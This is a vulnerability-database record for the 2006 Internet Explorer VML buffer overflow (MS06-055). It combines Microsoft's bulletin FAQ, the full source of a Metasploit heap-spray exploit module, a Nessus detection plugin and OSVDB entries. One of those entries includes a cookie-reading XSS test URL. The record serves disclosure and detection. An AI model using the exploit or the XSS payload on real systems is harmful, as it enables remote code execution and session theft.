are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the VML implementation in Microsoft Windows.\r\n\r\nWhat is VML?\r\nVector Markup Language (VML) is an XML-based exchange, editing, and delivery format for high-quality vector graphics on the Web that meets the needs of both productivity users and graphic design professionals. XML is a simple, flexible, and open text-based language that complements HTML. For more information on the VML, see the product documentation.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail in plain text are at less risk from this vulnerability. Instead users would have to either click on a link that would take them to a malicious Web site or open an attachment to be at risk from this vulnerability.\r\n\r\nCustomers who read e-mail in plain text would also be at less risk when using the Outlook or Outlook Express preview panes.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running specially crafted Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nFor more information regarding Internet Explorer Enhanced Security Configuration, see the guide, Managing Internet Explorer Enhanced Security Configuration, at the following Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Windows validates the length of data before storing it in the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2006-4868.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2006-4868.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nISS X-Force for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\u2022\t\r\n\r\niDEFENSE for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\u2022\t\r\n\r\nDan Hubbard at Websense Security Labs for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (September 26, 2006): Bulletin published.", "modified": "2006-09-27T00:00:00", "published": "2006-09-27T00:00:00", "id": "SECURITYVULNS:DOC:14434", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14434", "title": "Microsoft Security Bulletin MS06-055 Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:36", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83194/Internet-Explorer-VML-Fill-Method-Code-Execution.html", "id": "PACKETSTORM:83194", "type": "packetstorm", "title": "Internet Explorer VML Fill Method Code Execution", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Internet Explorer VML Fill Method Code Execution', \n'Description' => %q{ \nThis module exploits a code execution vulnerability in Microsoft Internet Explorer using \na buffer overflow in the VML processing code (VGX.dll). This module has been tested on \nWindows 2000 SP4, Windows XP SP0, and Windows XP SP2. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'hdm', \n'Aviv Raff <avivra [at] gmail.com>', \n'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', \n'Mr.Niega <Mr.Niega [at] gmail.com>', \n'M. Shirk <shirkdog_list [at] hotmail.com>' \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-4868' ], \n['OSVDB', '28946' ], \n['MSB', 'MS06-055' ], \n['BID', '20096' ], \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ] \n], \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \n \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Determine the buffer length to use \nbuflen = 1024 \nif (request.headers['User-Agent'] =~ /Windows 5\\.[123]/) \nbuflen = 65535 \nend \n \n# Encode the shellcode \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Get a unicode friendly version of the return address \naddr_word = [target.ret].pack('V').unpack('H*')[0][0,4] \n \n# Select a random VML element to use \nvmls = %w{ rect roundrect line polyline oval image arc curve } \nvmlelem = vmls[ rand(vmls.length) ] \n \n# The overflow buffer for the method attribute \nbuffer = (\"&#x\" + addr_word + \";\") * buflen \n \n# Generate a random XML namespace for VML \nxmlns = rand_text_alpha(rand(30)+2) \n \n# Randomize the javascript variable names \nvar_buffer = rand_text_alpha(rand(30)+2) \nvar_shellcode = rand_text_alpha(rand(30)+2) \nvar_unescape = rand_text_alpha(rand(30)+2) \nvar_x = rand_text_alpha(rand(30)+2) \nvar_i = rand_text_alpha(rand(30)+2) \n \n# Build out the message \ncontent = %Q| \n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" > \n<head> \n<style> #{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style> \n<body> \n<script> \n \nvar #{var_unescape} = unescape ; \nvar #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ; \n \nvar #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ; \nwhile (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; \n \nvar #{var_x} = new Array() ; \nfor ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { \n#{var_x}[ #{var_i} ] = \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + \n#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; \n} \n \n</script> \n<#{xmlns}:#{vmlelem}> \n<#{xmlns}:fill method = \"#{buffer}\" /> \n</#{xmlns}:#{vmlelem}> \n \n</body> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83194/ms06_055_vml_method.rb.txt"}], "nessus": [{"lastseen": "2019-11-03T12:15:43", "bulletinFamily": "scanner", "description": "The remote host is running a version of Internet Explorer or Outlook Express\nthat is vulnerable to a bug in the Vector Markup Language (VML) handling routine\nthat could allow an attacker execute arbitrary code on the remote host by sending\na specially crafted email or by luring a user on the remote host into visiting\na rogue website.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS06-055.NASL", "href": "https://www.tenable.com/plugins/nessus/22449", "published": "2006-09-26T00:00:00", "title": "MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)", "type": "nessus", "sourceData": "#\n# Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22449);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-4868\");\n script_bugtraq_id(20096);\n script_xref(name:\"CERT\", value:\"416092\");\n script_xref(name:\"MSFT\", value:\"MS06-055\");\n script_xref(name:\"MSKB\", value:\"925486\");\n\n script_name(english:\"MS06-055: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)\");\n script_summary(english:\"Determines the presence of update 925486\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the email client or\nthe web browser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Internet Explorer or Outlook Express\nthat is vulnerable to a bug in the Vector Markup Language (VML) handling routine\nthat could allow an attacker execute arbitrary code on the remote host by sending\na specially crafted email or by luring a user on the remote host into visiting\na rogue website.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-055\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-055';\nkb = '925486';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\ndir = hotfix_get_commonfilesdir();\nif (!dir) exit(1, \"Failed to get the common files directory.\");\n\nshare = hotfix_path2share(path:dir);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Vgx.dll\", version:\"6.0.3790.593\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Vgx.dll\", version:\"6.0.3790.2794\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Vgx.dll\", version:\"6.0.2800.1580\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Vgx.dll\", version:\"6.0.2900.2997\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Vgx.dll\", version:\"6.0.2800.1580\", min_version:\"6.0.0.0\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Vgx.dll\", version:\"5.0.3845.1800\", dir:\"\\Microsoft Shared\\VGX\", path:dir, bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nackerTodo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'task_id' variable upon submission to the index.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nackerTodo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'task_id' variable upon submission to the index.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\n/index.php?cmd=edit_task&task_id=\"><script>document.write(document.cookie);</script>\n## References:\nVendor URL: http://ackertodo.sourceforge.net/site2/index.html\n[Secunia Advisory ID:21810](https://secuniaresearch.flexerasoftware.com/advisories/21810/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0106.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0440.html\nISS X-Force ID: 28810\nFrSIRT Advisory: ADV-2006-3517\n[CVE-2006-4668](https://vulners.com/cve/CVE-2006-4668)\nBugtraq ID: 19894\n", "modified": "2006-09-07T06:04:08", "published": "2006-09-07T06:04:08", "href": "https://vulners.com/osvdb/OSVDB:28611", "id": "OSVDB:28611", "type": "osvdb", "title": "ackerTodo index.php task_id Variable XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote stack-based buffer overflow exists in Microsoft Internet Explorer. The browser's vml rendering engine fails to check the length of a fill parameter on the rect tag resulting in a stack-based buffer overflow. With a specially crafted request that contains a vml graphics, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nSome recommendations included to disable active scripting or changing the access control list of the vgx.dll. Those recommendations do NOT successfully mitigate the risk.\n## Solution Description\nMicrosoft has released a patch to address this issue. Additionally, it is possible to correct the flaw by implementing the following workaround(s):\n\nTo un-register Vgx.dll, follow these steps:\n\nClick Start, click Run, type \"regsvr32 -u \"%ProgramFiles%\\Common Files\\Microsoft Shared\\VGX\\vgx.dll \" (without the quotation marks), and then click OK. \n## Short Description\nA remote stack-based buffer overflow exists in Microsoft Internet Explorer. The browser's vml rendering engine fails to check the length of a fill parameter on the rect tag resulting in a stack-based buffer overflow. With a specially crafted request that contains a vml graphics, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor Specific News/Changelog Entry: http://www.microsoft.com/technet/security/advisory/925568.mspx\n[Secunia Advisory ID:21989](https://secuniaresearch.flexerasoftware.com/advisories/21989/)\nOther Advisory URL: http://vil.nai.com/vil/Content/v_140629.htm\nOther Advisory URL: http://vil.nai.com/vil/Content/v_vul26881.htm\nOther Advisory URL: http://sunbeltblog.blogspot.com/2006/09/vulnerable-versions-of-outlook.html\nNews Article: http://news.com.com/Microsoft+mulls+early+IE+patch+release/2100-1002_3-6119393.html\nNews Article: http://www.theinquirer.net/default.aspx?article=37781\nNews Article: http://blog.washingtonpost.com/securityfix/2006/09/unofficial_patch_released_for_1.html\nNews Article: http://www.eweek.com/article2/0,1895,2017626,00.asp\nMicrosoft Security Bulletin: MS06-055\nMicrosoft Knowledge Base Article: 925486\nMicrosoft Knowledge Base Article: 925568\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0327.html\nISS X-Force ID: 29004\nGeneric Informational URL: http://blogs.securiteam.com/?p=640\nGeneric Informational URL: http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html\nGeneric Informational URL: http://www.w3.org/TR/NOTE-VML.html\nGeneric Informational URL: http://www.avertlabs.com/research/blog/?p=90\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/vml.c\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2425\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/20096.html\nFrSIRT Advisory: ADV-2006-3679\n[CVE-2006-3866](https://vulners.com/cve/CVE-2006-3866)\n[CVE-2006-4868](https://vulners.com/cve/CVE-2006-4868)\nCERT VU: 416092\nBugtraq ID: 20096\n", "modified": "2006-09-19T07:03:57", "published": "2006-09-19T07:03:57", "href": "https://vulners.com/osvdb/OSVDB:28946", "id": "OSVDB:28946", "type": "osvdb", "title": "Microsoft IE Vector Markup Language (VML) Arbitrary Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
